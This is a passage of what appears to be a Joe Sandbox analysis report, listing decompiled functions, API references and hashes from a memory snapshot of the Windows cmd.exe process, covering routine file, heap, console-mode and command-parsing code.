                                    • Opcode Fuzzy Hash: 3c5deb9ecaa0acb2f520498a0b6c59ca6dc1e01f3bdae5207fec74ced7b54b32
                                    • Instruction Fuzzy Hash: 61115A70904B04DAEB3C9FB4B04C23836E1FB18359FA4462EE066861D5DB3789C1CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D43A0, Relevance: 6.0, APIs: 4, Instructions: 47fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 75%
                                    			E011D43A0(void* __ecx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES _v16;
				void* _t6;
				long _t7;
				void* _t10;
				void* _t15;
				void* _t17;

				_v16.bInheritHandle = 1;
				_v16.lpSecurityDescriptor = 0;
				_v16.nLength = 0xc;
				_t6 = CreateFileW(E011E22C0(_t10, __ecx), 0x40000000, 0,  &_v16, 4, 0x8000080, 0);
				_t15 = _t6;
				if(_t15 == 0xffffffff) {
					_t7 = GetLastError();
					 *0x1213cf0 = _t7;
					if(_t7 == 0x6e) {
						 *0x1213cf0 = 2;
					}
					_t17 = 0xffffffff;
				} else {
					__imp___open_osfhandle(_t15, 8);
					_t17 = _t6;
					if(_t17 == 0xffffffff) {
						CloseHandle(_t15);
					}
				}
				return _t17;
			}









                                    0x011d43ab
                                    0x011d43b3
                                    0x011d43b6
                                    0x011d43d5
                                    0x011d43db
                                    0x011d43e0
                                    0x011e838d
                                    0x011e8393
                                    0x011e839b
                                    0x011e839d
                                    0x011e839d
                                    0x011e83a7
                                    0x011d43e6
                                    0x011d43e9
                                    0x011d43ef
                                    0x011d43f6
                                    0x011d4401
                                    0x011d4401
                                    0x011d43f6
                                    0x011d43ff

                                    APIs
                                      • Part of subcall function 011E22C0: wcschr.MSVCRT ref: 011E22CC
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000), ref: 011D43D5
                                    • _open_osfhandle.MSVCRT ref: 011D43E9
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 011D4401
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011E838D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                    • String ID:
                                    • API String ID: 22757656-0
                                    • Opcode ID: 7dd4dec72c7617a690203a4fcb87fe2e89d1862389bafd8faacce0fe12aed399
                                    • Instruction ID: c46d2590374e1c5e5ed94f8303d3313607c23a97add8386e0a967e63a5608983
                                    • Opcode Fuzzy Hash: 7dd4dec72c7617a690203a4fcb87fe2e89d1862389bafd8faacce0fe12aed399
                                    • Instruction Fuzzy Hash: DB01F232804220ABD728ABACB80DB5EBBA8AB51B39F110319F974E31C0DFB008458791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E3B2C, Relevance: 6.0, APIs: 4, Instructions: 30memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 44%
                                    			E011E3B2C(void* __ecx) {
				void _t4;
				void* _t9;
				void* _t12;

				_t9 = __ecx;
				_t12 = HeapAlloc(GetProcessHeap(), 8, 4);
				if(_t12 == 0) {
					L4:
					return 0;
				} else {
					_t4 = E011E3AAE();
					 *_t12 = _t4;
					if(_t4 == 0) {
						RtlFreeHeap(GetProcessHeap(), 0, _t12);
						_push(0);
						_push(0x233a);
						E011DC5A2(_t9);
						goto L4;
					} else {
						return _t12;
					}
				}
			}






                                    0x011e3b2c
                                    0x011e3b40
                                    0x011e3b44
                                    0x011ee005
                                    0x011ee008
                                    0x011e3b4a
                                    0x011e3b4a
                                    0x011e3b4f
                                    0x011e3b53
                                    0x011edff1
                                    0x011edff7
                                    0x011edff9
                                    0x011edffe
                                    0x00000000
                                    0x011e3b59
                                    0x011e3b5c
                                    0x011e3b5c
                                    0x011e3b53

                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,011E3DBB), ref: 011E3B33
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011E3DBB), ref: 011E3B3A
                                      • Part of subcall function 011E3AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,011E3A9F), ref: 011E3AB2
                                      • Part of subcall function 011E3AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 011E3ACD
                                      • Part of subcall function 011E3AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3AD4
                                      • Part of subcall function 011E3AAE: memcpy.MSVCRT ref: 011E3AE3
                                      • Part of subcall function 011E3AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 011E3AEC
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,011E3DBB), ref: 011EDFEA
                                    • RtlFreeHeap.NTDLL(00000000,?,011E3DBB), ref: 011EDFF1
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocEnvironmentFreeStrings$memcpy
                                    • String ID:
                                    • API String ID: 197374240-0
                                    • Opcode ID: 2a500798ed1c25210fb46c0878df980409aaa44a5b7c4517a16f5a05102885cc
                                    • Instruction ID: 4c487068d14a3d6b0647b84abe2f30d3305ad894d05d26a4459f6eacb17d4a89
                                    • Opcode Fuzzy Hash: 2a500798ed1c25210fb46c0878df980409aaa44a5b7c4517a16f5a05102885cc
                                    • Instruction Fuzzy Hash: 1BE09232A4461267EE3476F97C1DF862E949B94B39F114448FB85CA0C4DE20C4C08BA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F9897, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 37%
                                    			E011F9897() {
				signed int _v8;
				void* _t4;
				int _t5;
				void* _t7;
				void* _t9;

				_t4 =  &_v8;
				__imp___get_osfhandle(_t4, _t9);
				_t5 = GetConsoleMode(_t4, 1);
				if(_t5 != 0) {
					_t7 = _v8 & 0xfffffffb;
					_v8 = _t7;
					__imp___get_osfhandle(_t7);
					return SetConsoleMode(_t7, 1);
				}
				return _t5;
			}








                                    0x011f989d
                                    0x011f98a3
                                    0x011f98ab
                                    0x011f98b3
                                    0x011f98b8
                                    0x011f98be
                                    0x011f98c1
                                    0x00000000
                                    0x011f98c9
                                    0x011f98d2

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F98A3
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,011F3811,?,?,00000001,?), ref: 011F98AB
                                    • _get_osfhandle.MSVCRT ref: 011F98C1
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011F3811,?,?,00000001,?), ref: 011F98C9
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ConsoleMode_get_osfhandle
                                    • String ID:
                                    • API String ID: 1606018815-0
                                    • Opcode ID: 7212170d9ac54259dcb61945c81d657af1683eb9892d0b80b239e2f5ca9b386f
                                    • Instruction ID: dad0fbfef5491f2ff70b8b154ce74b5d15a43aeff037ec27626b183b96b7690e
                                    • Opcode Fuzzy Hash: 7212170d9ac54259dcb61945c81d657af1683eb9892d0b80b239e2f5ca9b386f
                                    • Instruction Fuzzy Hash: 1BE01A72900609EBEF20DBA5E81EBAA7B6CEB00325F100956F915C61C1DE71DA809B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E4C00, Relevance: 6.0, APIs: 4, Instructions: 17COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 37%
                                    			E011E4C00() {
				void* _t1;
				void* _t2;
				intOrPtr _t4;

				_t4 =  *0x120387c;
				_t1 =  *0x1203878;
				 *0x1203880 = _t4;
				 *0x1203884 = _t1;
				__imp___get_osfhandle(_t4);
				_t2 = SetConsoleMode(_t1, 1);
				__imp___get_osfhandle( *0x1203884);
				return SetConsoleMode(_t2, 0);
			}






                                    0x011e4c00
                                    0x011e4c06
                                    0x011e4c0e
                                    0x011e4c14
                                    0x011e4c19
                                    0x011e4c21
                                    0x011e4c2f
                                    0x011e4c3d

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E4C19
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E4C21
                                    • _get_osfhandle.MSVCRT ref: 011E4C2F
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E4C37
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ConsoleMode_get_osfhandle
                                    • String ID:
                                    • API String ID: 1606018815-0
                                    • Opcode ID: 0d436f267e146aaec29645c3d4618b2b7733ab316f18fe81d7d4d5981318e2d6
                                    • Instruction ID: ec6dbe24701a0c3c265431f4d6d29991e6dcf2e7dd235b3d323c8d355a4eef70
                                    • Opcode Fuzzy Hash: 0d436f267e146aaec29645c3d4618b2b7733ab316f18fe81d7d4d5981318e2d6
                                    • Instruction Fuzzy Hash: 03E0BDB2A00201EFEF2ADBA0F81EB547BB5F718305B001A9AF1118318ADBB1A580DB10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DACD5, Relevance: 6.0, APIs: 4, Instructions: 15memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E011DACD5(void** __ecx) {
				void* _t6;

				_t6 = __ecx;
				RtlFreeHeap(GetProcessHeap(), 0,  *__ecx);
				return RtlFreeHeap(GetProcessHeap(), 0, _t6);
			}




                                    0x011dacd8
                                    0x011dace5
                                    0x011dacfc

                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,011DACAB), ref: 011DACDE
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DACE5
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 011DACEE
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011DACF5
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: ea90221ba5e5c74c1bed722ef868257a90c0bdc25c0d243a2a47a77c8d4fc69d
                                    • Instruction ID: 316ab2fa5e4eda9d2893ef8daea3b0ef5cd291242f6a99c940100309ea334011
                                    • Opcode Fuzzy Hash: ea90221ba5e5c74c1bed722ef868257a90c0bdc25c0d243a2a47a77c8d4fc69d
                                    • Instruction Fuzzy Hash: 46D09232804110ABDE607BA1B81DBC63A28EB59226F110449FA4582048CEB088C08B61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D9429, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 71%
                                    			E011D9429(void* __ebx, signed short* __ecx, void* __edi) {
				intOrPtr _v8;
				signed int _t19;
				intOrPtr _t20;
				void* _t21;
				void* _t22;
				signed int _t23;
				signed int _t26;
				void* _t28;
				signed int _t34;
				signed int _t35;
				char* _t37;
				signed int _t38;
				void* _t40;
				signed int _t43;
				signed int _t45;
				signed int _t47;
				intOrPtr* _t51;
				signed int _t55;
				void* _t56;
				signed int _t61;
				signed short* _t70;
				signed int _t71;
				signed int _t76;
				signed int _t77;
				void* _t78;
				void* _t79;
				signed int _t82;
				signed int _t84;
				void* _t86;
				signed int _t87;
				signed int _t89;

				_push(__ecx);
				_t89 = __ecx;
				if(__ecx == 0) {
					L17:
					_t19 = 1;
					L12:
					return _t19;
				}
				_t20 = E011E00B0(0xffce);
				_v8 = _t20;
				if(_t20 == 0) {
					goto L17;
				}
				_push(__ebx);
				_t21 = 0x5e;
				_t22 = E011DD7D4(__ecx, _t21);
				_t45 = 0;
				if(_t22 != 0) {
					_t51 = __ecx;
					_t70 =  &(__ecx[1]);
					do {
						_t23 =  *_t51;
						_t51 = _t51 + 2;
						__eflags = _t23;
					} while (_t23 != 0);
					_t84 = E011E00B0(2 + (_t51 - _t70 >> 1) * 4);
					__eflags = _t84;
					if(_t84 == 0) {
						L51:
						_t19 = 1;
						L11:
						goto L12;
					}
					_t26 =  *__ecx & 0x0000ffff;
					_t55 = _t84;
					__eflags = _t26;
					if(_t26 == 0) {
						L28:
						_t71 = _t84;
						__eflags = 0;
						 *_t55 = 0;
						_t11 = _t71 + 2; // 0x2
						_t56 = _t11;
						do {
							_t28 =  *_t71;
							_t71 = _t71 + 2;
							__eflags = _t28 - _t45;
						} while (_t28 != _t45);
						_t89 = E011E0100(_t84, 2 + (_t71 - _t56 >> 1) * 2);
						__eflags = _t89;
						if(_t89 == 0) {
							goto L51;
						}
						goto L3;
					}
					_t82 = _t26;
					_t47 = 0x5e;
					do {
						 *_t55 = _t82;
						_t89 = _t89 + 2;
						_t55 = _t55 + 2;
						__eflags = _t82 - _t47;
						if(_t82 == _t47) {
							 *_t55 = _t47;
							_t55 = _t55 + 2;
							__eflags = _t55;
						}
						_t43 =  *_t89 & 0x0000ffff;
						_t82 = _t43;
						__eflags = _t43;
					} while (_t43 != 0);
					_t45 = 0;
					__eflags = 0;
					goto L28;
				}
				L3:
				 *0x11fd538 = 1;
				_t86 = E011DEEF0(1, _t89,  *0x1213cd8);
				 *0x11fd538 = _t45;
				if(_t86 == 1) {
					_t87 = E011DDF40(_t89);
					__eflags = _t87;
					if(_t87 == 0) {
						goto L51;
					}
					__imp___wcsupr(_t87);
					_t61 = L" IF";
					_t34 = _t87;
					while(1) {
						_t76 =  *_t34;
						__eflags = _t76 -  *_t61;
						if(_t76 !=  *_t61) {
							break;
						}
						__eflags = _t76;
						if(_t76 == 0) {
							L38:
							_t35 = _t45;
							L40:
							__eflags = _t35;
							if(_t35 == 0) {
								L49:
								E011DC5A2(_t61, 0x234a, 1, _t89);
								goto L51;
							}
							_t37 = L" FOR";
							while(1) {
								_t61 =  *_t87;
								__eflags = _t61 -  *_t37;
								if(_t61 !=  *_t37) {
									break;
								}
								__eflags = _t61;
								if(_t61 == 0) {
									L48:
									__eflags = _t45;
									if(_t45 != 0) {
										goto L51;
									}
									goto L49;
								}
								_t61 =  *((intOrPtr*)(_t87 + 2));
								__eflags = _t61 - _t37[2];
								if(_t61 != _t37[2]) {
									break;
								}
								_t87 = _t87 + 4;
								_t37 =  &(_t37[4]);
								__eflags = _t61;
								if(_t61 != 0) {
									continue;
								}
								goto L48;
							}
							asm("sbb ebx, ebx");
							_t45 = _t45 | 0x00000001;
							__eflags = _t45;
							goto L48;
						}
						_t77 =  *((intOrPtr*)(_t34 + 2));
						__eflags = _t77 -  *((intOrPtr*)(_t61 + 2));
						if(_t77 !=  *((intOrPtr*)(_t61 + 2))) {
							break;
						}
						_t34 = _t34 + 4;
						_t61 = _t61 + 4;
						__eflags = _t77;
						if(_t77 != 0) {
							continue;
						}
						goto L38;
					}
					asm("sbb eax, eax");
					_t35 = _t34 | 0x00000001;
					__eflags = _t35;
					goto L40;
				}
				if(_t86 == 0xffffffff) {
					_t19 = 0;
					goto L11;
				}
				if( *0x1213cc9 == 0 ||  *((short*)( *((intOrPtr*)(_t86 + 0x38)))) != 0x3a) {
					_t78 = 0x2a;
					_t38 = E011DD7D4( *((intOrPtr*)(_t86 + 0x38)), _t78);
					__eflags = _t38;
					if(_t38 != 0) {
						L16:
						_t19 = E011E07C0(_t45, _t86);
						goto L11;
					}
					_t79 = 0x3f;
					__eflags = E011DD7D4( *((intOrPtr*)(_t86 + 0x38)), _t79);
					if(__eflags != 0) {
						goto L16;
					}
					_t91 = _v8;
					_t40 = E011E10B0(_t86, _v8, __eflags, 0x7fe7);
					__eflags = _t40 - 2;
					if(_t40 == 2) {
						goto L9;
					}
					goto L16;
				} else {
					if( *0x1213cc4 == 0) {
						_push(_t45);
						_push(0x400023aa);
						E011DC5A2(1);
						goto L51;
					}
					_t91 = _v8;
					L9:
					_t19 = E011E2ABE(_t86, _t91, 0x7fe7, 1);
					if(_t19 == 0) {
						_t19 =  *0x120b8b0;
					}
					goto L11;
				}
			}


































                                    0x011d942e
                                    0x011d9430
                                    0x011d9434
                                    0x011d9517
                                    0x011d9519
                                    0x011d94d5
                                    0x011d94d9
                                    0x011d94d9
                                    0x011d943f
                                    0x011d9444
                                    0x011d9449
                                    0x00000000
                                    0x00000000
                                    0x011d944f
                                    0x011d9453
                                    0x011d9458
                                    0x011d945d
                                    0x011d9461
                                    0x011f0975
                                    0x011f0977
                                    0x011f097a
                                    0x011f097a
                                    0x011f097d
                                    0x011f0980
                                    0x011f0980
                                    0x011f0995
                                    0x011f0997
                                    0x011f0999
                                    0x011f0aa4
                                    0x011f0aa6
                                    0x011d94d3
                                    0x00000000
                                    0x011d94d4
                                    0x011f099f
                                    0x011f09a2
                                    0x011f09a4
                                    0x011f09a7
                                    0x011f09ce
                                    0x011f09ce
                                    0x011f09d0
                                    0x011f09d2
                                    0x011f09d5
                                    0x011f09d5
                                    0x011f09d8
                                    0x011f09d8
                                    0x011f09db
                                    0x011f09de
                                    0x011f09de
                                    0x011f09f5
                                    0x011f09f7
                                    0x011f09f9
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f09ff
                                    0x011f09ab
                                    0x011f09ad
                                    0x011f09ae
                                    0x011f09ae
                                    0x011f09b1
                                    0x011f09b4
                                    0x011f09b7
                                    0x011f09ba
                                    0x011f09bc
                                    0x011f09bf
                                    0x011f09bf
                                    0x011f09bf
                                    0x011f09c2
                                    0x011f09c5
                                    0x011f09c7
                                    0x011f09c7
                                    0x011f09cc
                                    0x011f09cc
                                    0x00000000
                                    0x011f09cc
                                    0x011d9467
                                    0x011d9474
                                    0x011d947e
                                    0x011d9480
                                    0x011d9489
                                    0x011f0a0b
                                    0x011f0a0d
                                    0x011f0a0f
                                    0x00000000
                                    0x00000000
                                    0x011f0a16
                                    0x011f0a1d
                                    0x011f0a22
                                    0x011f0a24
                                    0x011f0a24
                                    0x011f0a27
                                    0x011f0a2a
                                    0x00000000
                                    0x00000000
                                    0x011f0a2c
                                    0x011f0a2f
                                    0x011f0a46
                                    0x011f0a46
                                    0x011f0a4f
                                    0x011f0a4f
                                    0x011f0a51
                                    0x011f0a85
                                    0x011f0a8d
                                    0x00000000
                                    0x011f0a92
                                    0x011f0a53
                                    0x011f0a58
                                    0x011f0a58
                                    0x011f0a5b
                                    0x011f0a5e
                                    0x00000000
                                    0x00000000
                                    0x011f0a60
                                    0x011f0a63
                                    0x011f0a81
                                    0x011f0a81
                                    0x011f0a83
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f0a83
                                    0x011f0a65
                                    0x011f0a69
                                    0x011f0a6d
                                    0x00000000
                                    0x00000000
                                    0x011f0a6f
                                    0x011f0a72
                                    0x011f0a75
                                    0x011f0a78
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f0a7a
                                    0x011f0a7c
                                    0x011f0a7e
                                    0x011f0a7e
                                    0x00000000
                                    0x011f0a7e
                                    0x011f0a31
                                    0x011f0a35
                                    0x011f0a39
                                    0x00000000
                                    0x00000000
                                    0x011f0a3b
                                    0x011f0a3e
                                    0x011f0a41
                                    0x011f0a44
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f0a44
                                    0x011f0a4a
                                    0x011f0a4c
                                    0x011f0a4c
                                    0x00000000
                                    0x011f0a4c
                                    0x011d9492
                                    0x011d951c
                                    0x00000000
                                    0x011d951c
                                    0x011d949f
                                    0x011d94df
                                    0x011d94e0
                                    0x011d94e5
                                    0x011d94e7
                                    0x011d950e
                                    0x011d9510
                                    0x00000000
                                    0x011d9510
                                    0x011d94ee
                                    0x011d94f4
                                    0x011d94f6
                                    0x00000000
                                    0x00000000
                                    0x011d94f8
                                    0x011d9504
                                    0x011d9509
                                    0x011d950c
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d94aa
                                    0x011d94b1
                                    0x011f0a97
                                    0x011f0a98
                                    0x011f0a9d
                                    0x00000000
                                    0x011f0aa3
                                    0x011d94b7
                                    0x011d94ba
                                    0x011d94c5
                                    0x011d94cc
                                    0x011d94ce
                                    0x011d94ce
                                    0x00000000
                                    0x011d94cc

                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                      • Part of subcall function 011DD7D4: wcschr.MSVCRT ref: 011DD7DA
                                      • Part of subcall function 011DEEF0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,011DE5F6,?,00000000,00000000,00000000), ref: 011DEF39
                                      • Part of subcall function 011DEEF0: RtlFreeHeap.NTDLL(00000000,?,011DE5F6), ref: 011DEF40
                                      • Part of subcall function 011DEEF0: _setjmp3.MSVCRT ref: 011DEFA5
                                    • _wcsupr.MSVCRT ref: 011F0A16
                                      • Part of subcall function 011E2ABE: memset.MSVCRT ref: 011E2B59
                                      • Part of subcall function 011E2ABE: ??_V@YAXPAX@Z.MSVCRT ref: 011E2C13
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
                                    • String ID: FOR$ IF
                                    • API String ID: 3818062306-2924197646
                                    • Opcode ID: 7d4da49165f7043b59d530ac4db86cddf4e1734a70d836e0899047e3eca2637b
                                    • Instruction ID: bdd056f49abe3a42dbb47cc429709a94b2f7332799ef172122c85a4215c72833
                                    • Opcode Fuzzy Hash: 7d4da49165f7043b59d530ac4db86cddf4e1734a70d836e0899047e3eca2637b
                                    • Instruction Fuzzy Hash: 5051383570020386EB3EAB6C981477B6293EF9861CB55412DEB068B296FF71D985C381
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011FB2BF, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 98%
                                    			E011FB2BF(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t68;
				signed int _t70;
				int _t73;
				signed int _t78;
				signed int _t79;
				intOrPtr _t82;
				signed int _t88;
				void* _t93;
				intOrPtr _t96;
				signed int _t99;
				signed int _t100;
				intOrPtr* _t101;
				short _t105;
				long _t108;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				signed int _t121;
				signed int _t124;
				void* _t125;
				intOrPtr _t126;
				void* _t128;

				_push(0x30);
				_push(0x11fc160);
				E011E7678(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t128 - 0x3c)) = __edx;
				 *((intOrPtr*)(_t128 - 0x24)) = __ecx;
				_t68 = E011E00B0(0x4000);
				_t93 = _t68;
				 *(_t128 - 0x40) = _t93;
				if(_t93 == 0) {
					L46:
					return E011E76BD(_t68);
				}
				_t121 = 0;
				 *((intOrPtr*)(_t128 - 4)) = 0;
				if( *((intOrPtr*)(_t128 + 0x14)) != 0) {
					L4:
					_t115 = _t121;
					 *(_t128 - 0x2c) = _t115;
					_t119 = _t121;
					 *(_t128 - 0x28) = _t119;
					_t70 = _t68 | 0xffffffff;
					__eflags = _t70;
					 *(_t128 - 0x1c) = _t70;
					 *(_t128 - 0x30) = _t70;
					 *(_t128 - 0x20) = _t121;
					 *(_t128 - 0x34) = 0x2a;
					while(1) {
						 *(_t128 - 0x38) = _t121;
						_t96 =  *((intOrPtr*)(_t128 + 8));
						__eflags = _t121 - _t96;
						if(_t121 >= _t96) {
							break;
						}
						_t108 =  *( *((intOrPtr*)(_t128 - 0x24)) + _t121 * 2) & 0x0000ffff;
						__eflags = _t108 - 0x2f;
						if(_t108 != 0x2f) {
							__eflags = _t108 - 0x22;
							if(_t108 != 0x22) {
								__eflags = _t115;
								if(_t115 != 0) {
									L17:
									_t110 =  *( *((intOrPtr*)(_t128 - 0x24)) + _t121 * 2) & 0x0000ffff;
									__eflags = _t110 - 0x3a;
									if(_t110 == 0x3a) {
										L22:
										_t35 = _t121 + 1; // 0x1
										_t70 = _t35;
										 *(_t128 - 0x1c) = _t70;
										 *(_t128 - 0x30) = _t70;
										L23:
										__eflags = 0;
										 *(_t128 - 0x20) = 0;
										L24:
										_t121 = _t121 + 1;
										continue;
									}
									__eflags = _t110 - 0x5c;
									if(_t110 == 0x5c) {
										goto L22;
									}
									__eflags = _t110 -  *(_t128 - 0x34);
									if(_t110 ==  *(_t128 - 0x34)) {
										L21:
										 *(_t128 - 0x20) = 1;
										goto L24;
									}
									__eflags = _t110 - 0x3f;
									if(_t110 != 0x3f) {
										goto L24;
									}
									goto L21;
								}
								_t88 = wcschr(L" &()[]{}^=;!%\'+,`~", _t108);
								_t115 =  *(_t128 - 0x2c);
								__eflags = _t88;
								if(_t88 == 0) {
									_t70 =  *(_t128 - 0x1c);
									goto L17;
								}
								_t25 = _t121 + 1; // 0x1
								_t119 = _t25;
								 *(_t128 - 0x28) = _t119;
								__eflags = 0;
								 *(_t128 - 0x20) = 0;
								L15:
								_t70 =  *(_t128 - 0x1c);
								goto L24;
							}
							__eflags = _t115;
							if(_t115 == 0) {
								_t119 = _t121;
								 *(_t128 - 0x28) = _t119;
							}
							__eflags = _t115;
							_t115 = 0 | _t115 == 0x00000000;
							 *(_t128 - 0x2c) = _t115;
							goto L15;
						}
						_t18 = _t121 + 1; // 0x1
						_t119 = _t18;
						 *(_t128 - 0x28) = _t119;
						goto L23;
					}
					__eflags = _t70 - 0xffffffff;
					if(_t70 == 0xffffffff) {
						L27:
						_t122 = _t119;
						 *(_t128 - 0x30) = _t119;
						L29:
						_t73 = _t96 - _t119 + _t96 - _t119;
						 *(_t128 - 0x34) = _t73;
						memcpy(_t93,  *((intOrPtr*)(_t128 - 0x24)) + _t119 * 2, _t73);
						_t78 =  *((intOrPtr*)(_t128 + 8)) - _t119;
						__eflags =  *(_t128 - 0x20);
						if(__eflags != 0) {
							__eflags = 0;
							 *((short*)(_t93 + _t78 * 2)) = 0;
						} else {
							_t105 = 0x2a;
							 *((short*)(_t93 + _t78 * 2)) = _t105;
							 *((short*)( *(_t128 - 0x34) + _t93 + 2)) = 0;
						}
						_t124 =  *(_t128 + 0x10);
						_t79 = E011FAEE5(_t93, __eflags, _t124, _t122 - _t119);
						 *0x11fd580 = _t79;
						_t99 = _t79;
						 *0x11fd57c = _t99;
						 *0x11fd574 = _t119;
						 *0x11fd578 = _t124;
						_t121 = 0;
						__eflags = 0;
						L33:
						if(_t79 == 0) {
							L45:
							 *((intOrPtr*)(_t128 - 4)) = 0xfffffffe;
							E011FB4D5(_t93);
							_t68 =  *0x11fd580; // 0x0
							goto L46;
						}
						if( *((intOrPtr*)(_t128 + 0xc)) == 0) {
							_t100 = _t99 - 1;
							__eflags = _t100;
							 *0x11fd57c = _t100;
							if(_t100 >= 0) {
								L40:
								_t116 =  *((intOrPtr*)( *0x121853c + _t100 * 4));
